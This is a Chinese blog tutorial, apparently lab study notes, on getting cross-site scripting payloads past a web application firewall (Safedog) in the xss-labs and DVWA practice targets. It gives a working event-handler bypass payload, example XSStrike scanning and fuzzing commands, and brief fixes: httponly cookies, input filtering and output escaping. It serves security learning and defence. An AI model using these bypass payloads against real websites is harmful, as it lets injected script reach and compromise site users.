WEB漏洞-XSS跨站之WAF绕过及安全修复

最新推荐文章于 2024-06-27 22:21:33 发布
最新推荐文章于 2024-06-27 22:21:33 发布
阅读量680 收藏 2
点赞数 1
分类专栏: WEB安全-XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441315/article/details/119747063
版权

WEB漏洞-XSS跨站之WAF绕过及安全修复

waf防护演示

靶场:xss-labs
在这里插入图片描述

被安全狗拦截
在这里插入图片描述
分析拦截情况
分析方法:
1、通过去除关键词或关键词的其中些字母判断拦截了什么关键词,如下正常
在这里插入图片描述
2、分析了拦截情况可知也可能是尖括号里面如果有s、o之类的关键词其中的某个或多个字母的话就会拦截,正则表达式
在这里插入图片描述
3、不拦截,但是不管用
在这里插入图片描述
4、正常,并且可以访问
在这里插入图片描述
/结束
在这里插入图片描述

常规WAF绕过思路

标签语法替换
特殊符号干扰
/ #
提交方式更改
垃圾数据溢出
加密解密算法
结合其他漏洞绕过

XSStrike自动化工具说明

靶场:xss-labs,dvws

各个选项说明

-h, --help 显示帮助信息并退出
-u, --url 目标url
–data post方法的数据
-f, --file 从文件读取payloads
-t, --threads 线程数量
-l, --level 爬取级别
-t, --encode payload采取的编码
–json json格式的数据
–path 指定路径注入
–seeds 从文件加载url
–fuzzer fuzz工具
–update 更新
–timeout 超时时间
–params 寻找参数
–crawl 爬取
–proxy 使用代理
–blind 爬取时盲注
–skip 跳过确认等
–skip-dom 跳过dom检查
–headers 添加headers
-d, --delay 两次请求之间的延迟

-u或--url

添加目标url,单个GET方法
在这里插入图片描述

?name=<A/+/onmOuSeoVer%0d=%0dconfirm()%0dx>v3dm0s

挑选其中一个手动注入发现成功绕过
在这里插入图片描述

--data

post方法的数据(多个参数)

python xsstrike.py -u "http://IP地址/vulnerabilities/xss_s/" --data "txtName=test&mtxMessage=This+is+a+test+comment.&btnSign=Sign+Guestbook"

在这里插入图片描述

--seeds

从文件
选项:–seeds 不使用-u选项
python xsstrike.py --seeds urls.txt

在这里插入图片描述

--path

测试url路径组件

想要在URL路径中注入这样的有效负载 http://example.com/search/<payload>
python xsstrike.py -u "http://example.com/search/form/query" --path

--json

POST数据为json格式

python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"}' --json

--crawl

爬取

python xsstrike.py -u "http://ip地址/vulnerabilities/xss_r" --crawl

在这里插入图片描述

--level

爬取深度
选项-l或–level 默认为2

python xsstrike.py -u "http://IP地址/vulnerabilities/" --crawl -l 5

在这里插入图片描述

-f或--file

从文件读取payloads

python xsstrike.py -u "http://ip地址/vulnerabilities/xss_r?name=''" -f payloads.txt

在这里插入图片描述在这里插入图片描述

--params

查找隐藏参数

python xsstrike.py -u "http://ip地址/vulnerabilities/xss_r" --params

在这里插入图片描述

--fazzer

在这里插入图片描述

Fuzz下XSS绕过WAF

靶场:xss-labs
使用:fuzz模糊搜索
在这里插入图片描述
在这里插入图片描述

安全修复方案

开启httponly

https://www.yisu.com/zixun/310495.html

输入过滤

对输入进行过滤,不允许可能导致XSS攻击的字符输入

输出转义

根据输出点的位置对输出到前端的内容进行适当转义

硫酸超
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss绕过字符过滤_技术研究 | 绕过WAF的常见Web漏洞利用分析
weixin_42364539的博客
12-19 257
前言本文以最新版安全狗为例,总结一下我个人掌握的一些绕过WAF进行常见WEB漏洞利用的方法,希望能起到抛砖引玉的效果。如果师傅们有更好的方法,烦请不吝赐教。PS:本文仅用于技术研究与讨论,严禁用于任何非法用途,违者后果自负,作者与平台不承担任何责任测试环境PHPStudy(PHP5.4.45+Apache+MySQL5.5.53)+最新版安全狗(4.0.28330)靶场使用DVWA:ht...
第09篇:跨站脚本(XSS)备忘单-2019版1
08-03
第09篇:跨站脚本(XSS)备忘单-2019版1
XSSWaf绕过及工具使用(附靶场通关记录,持续更新)
m0_51468027的博客
02-01 5135
熟悉常见的waf绕过方法和工具使用,附靶场通关记录
XSS漏洞介绍以及waf绕过
最新发布
weixin_58052886的博客
06-27 1374
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的 Script 代码会被执行,从而达到恶意攻击用户的目的。主要在于程序对输入和输出的控制不够严格,导致攻击者在将script代码输入后,在前端浏览器被当作有效代码解析并执行从而产生危害。
WEB漏洞-XSS跨站WAF绕过
holen_的博客
01-19 382
常规WAF绕过思路 1.标签语法替换 <a href="">、<img src="">、<script src="">等 2.特殊符号干扰 / %#^&·········· 其中"/"在html中表示结束的意思 3.提交方式更改 从图中可以看到,安全狗对XSS的防护有URL层面,COOKIE层面,个别的也有POST层面 当变量name以post方式提交时,安全狗并没有拦截 (前提时对方支持以post这种提交方式发送) 4.垃圾数据溢出 垃圾数据就是加些乱七八糟的
WAF绕过-漏洞利用之注入上传跨站绕过
xhscxj的博客
02-22 1847
waf主要拦截的就是上图漏洞 SQL 注入 如需 sqlmap 注入 修改 us 头及加入代理防 CC 拦截自写 tamper 模块 安全狗:参考之前 payload Aliyun:基本修改指纹即可 宝塔:匹配关键字外加/*等 sqlmap --proxy="http://127.0.0.1:8080" --tamper="waf.py" --random-agent #文件上传 1.php 截断 参考前面上传 waf 绕过 payload #XSS 跨站 利用 XSStrike 绕过 加上--tim.
28 WEB漏洞-XSS跨站WAF绕过安全修复
山兔的博客
09-25 610
web层面里面,#会起到注释的作用,很多语言都是通用的,它是特殊的,基本上很多语言都会用到它,但是有些符号就不一定了,比如说在注入、上传或者其它漏洞里面,有些特殊符号是要根据你当前脚本网站的类型,还有我们当前操作的漏洞来取决于使用那些特殊符号,比如说像SQL注入漏洞,你写一些其它的符号,可能没有什么作用,因为在注入里面是跟数据库打交道,数据库对这些符号没有任何特殊的含义,你加上去仅仅只是加上去而已。特殊符号没有多少,也不用说那种漏洞,用那种特殊符号,特殊符号就是我们键盘上面的那几个,!
小迪安全学习笔记--第28天:web漏洞-xss跨站WAF绕过安全修复
zr1213159840的博客
01-03 582
常规WAF绕过思路 标签语法替换 特殊符号干扰 提交方式更改 垃圾数据溢出 加密解密算法 结合其他漏洞绕过 xssfuzzer.com可以自动生成语句 自动化工具说明 xssstrike主要特点反射和dom xss扫描 多线程爬虫,context分析,可配置核心,检测和规避waf,老旧的js库扫描,只能payload生成器,手工制作HTML和js解析器 https://github.com/s0md3v/XSStrike 安全修复方案 开启httponly 输入输出过滤等等 php相关:www.zuimog
xss绕过waf
None安全团队
04-28 1122
前言 360主机卫士是360旗下的服务器安全软件,为站长免费提供网站后门检测、木马查杀,网站补丁、漏洞防护等服务… (虽然软件几年前就停止更新,官网挂了,但是从当时的评论上看软件还是很不错的。) 环境 火狐 360主机卫士Apache版 phpStudy2016(PHP-5.4.45+Apache) 测试代码 <?php $input = @$_REQUEST["xss"]; echo "<div>".$input."</div>" ?> 测试 习惯性的
XSS测试绕过WAF思路
永远是少年
11-26 1315
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS测试绕过WAF思路。 一、XSS测试绕过WAF思路 二、常见XSS可替换标签
XSS绕过WAF的姿势
weixin_34112208的博客
05-16 400
初始测试 1.使用无害的payload,类似<b>,<i>,<u> 观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等; 2.如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应; 3.尝试以下payload <script>prompt(1)<...
第28天:WEB漏洞-XSS跨站WAF绕过安全修复1
08-03
WEB 漏洞-XSS 跨站WAF 绕过安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
Web-安全渗透全套教程漏洞扫描之Ap.zip
05-22
前端开发人员需要了解如何防止XSS跨站脚本攻击)和CSRF(跨站请求伪造)等常见攻击。XSS攻击允许攻击者注入恶意脚本到网页上,使用户在不知情的情况下执行攻击者的代码。而CSRF攻击则利用用户的已登录状态,诱使...
Web渗透-网络安全面试 面试宝典 2023最新版65页超全解析.pdf
10-16
6. **WAFWeb应用防火墙)绕过**:WAF用于保护Web应用,但渗透测试者需要寻找方法绕过其防护,如通过编码、混淆等技术。 7. **社工与APT**:社会工程学利用人类行为获取信息,APT(高级持续性威胁)是一种长期、...
Web-安全渗透全套教程安全渗.zip
05-22
9. **Web应用防火墙(WAF)与安全实践**:WAF可以帮助阻止已知的攻击模式,但了解其工作原理以及如何绕过WAF也是渗透测试的一部分。 10. **漏洞扫描与利用工具**:Nessus、Burp Suite、OWASP ZAP等工具在Web安全...
XSS绕过waf
m0_52813136的博客
07-28 1251
XSS绕过waf靶机
xss_waf绕过
weixin_44110913的博客
08-21 1545
写在前面: ————————————————————————————————————————————————— 当你的才华 还撑不起的野心时 那你就应该静下心来学习 ————————————————————————————————————————————————— 第一次翻译长篇文档,如有疏漏还请各位大牛指正。OWASP的这篇速查表虽然时间比较久了,但还在更新,所以还是翻译出来了。翻译完发现里...
XSS绕过安全WAF
永远是少年
11-25 2950
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS绕过安全WAF。 一、测试环境搭建 二、XSS绕过安全WAF
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值